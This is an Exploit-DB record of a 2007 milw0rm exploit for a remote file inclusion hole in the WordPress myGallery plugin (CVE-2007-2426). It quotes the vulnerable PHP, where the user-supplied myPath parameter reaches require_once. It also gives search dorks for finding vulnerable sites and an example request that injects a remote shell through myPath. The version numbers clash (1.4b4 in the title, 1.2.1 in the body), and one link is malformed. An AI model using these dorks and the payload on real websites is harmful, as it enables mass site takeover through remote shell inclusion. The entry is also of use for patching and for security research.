WordPress Plugin mygallery 1.4b4 - Remote File Inclusion

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2007-04-28  
date_updated: 2016-09-30  
verified: 1  
codes: OSVDB-34356;CVE-2007-2426  
tags: WordPress Plugin  
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.commygallery_1.2.1.zip  

raw file: 3814.txt  
AAAAAAAAA AAAAAAAA  AAA   AAA    AAA      AAAAAAAA
AAAAAAAAA AAAAAAAAA AAA   AAA   AAAAA    AAAAAAAAAA
   AAA    AAA   AAA  AAA AAA   AAAAAAA  AAA
   AAA    AAAAAAAAA   AAAAA   AAA   AAA AAA     AAAAA
   AAA    AAAAAAAA     AAA    AAA   AAA AAA     AAAAA
   AAA    AAA AAA      AAA    AAAAAAAAA AAA      AAA
   AAA    AAA  AAA     AAA    AAA   AAA  AAAAAAAAAA
   AAA    AAA   AAA    AAA    AAA   AAA   AAAAAAAA


# myGallery 1.2.1(myPath)Remote File Include Vulnerablity
# Script Paeg : http://www.wildbits.de/usr_files/mygallery_1.2.1.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code
#########################################################
# if (!$_POST){
# 	$mypath=$_GET['myPath']; <---------[+]
#
# }
# else {
# 	$mypath=$_POST['myPath'];<---------[+]
#
#
# }
# require_once($mypath.'/wp-config.php');<---------[+]
########################################################
# Dork :
# inurl:/mygallery/myfunctions/ (OR) Index of /mygallery/myfunctions (OR) inurl:mygallerytmpl.php
# Ex:
# [Path_myGallery]/mygallery/myfunctions/mygallerybrowser.php?myPath=Shell
# Sp.Thanx = Tryag-Team

# milw0rm.com [2007-04-29]